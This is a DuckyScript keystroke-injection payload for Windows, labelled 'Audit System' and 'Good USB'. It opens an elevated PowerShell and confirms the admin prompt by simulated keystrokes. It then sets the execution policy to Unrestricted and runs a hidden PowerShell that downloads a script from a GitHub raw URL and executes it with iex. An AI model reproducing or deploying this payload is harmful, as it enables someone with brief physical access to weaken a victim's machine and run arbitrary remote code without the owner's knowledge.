REM ###########################################################
REM #                                                         |
REM # Title        : Audit System 	                          |
REM # Author       : Dyl                                      |
REM # Version      : 1.0                                      |
REM # Category     : Good USB                                 |
REM # Target       : Windows                                  |
REM #                                                         |
REM ###########################################################
DELAY 500
GUI r
DELAY 400
STRING powershell Start-Process powershell -Verb runAs
CTRL-SHIFT ENTER
DELAY 1000
LEFT
DELAY 500
ENTER
DELAY 5000
STRING Set-ExecutionPolicy Unrestricted
DELAY 200
ENTER
DELAY 1000
STRING A
ENTER
DELAY 1000
STRING powershell -w h -ep bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ginnipig16/Flipper/main/DisableServiceConflict.ps1'))"
DELAY 5000
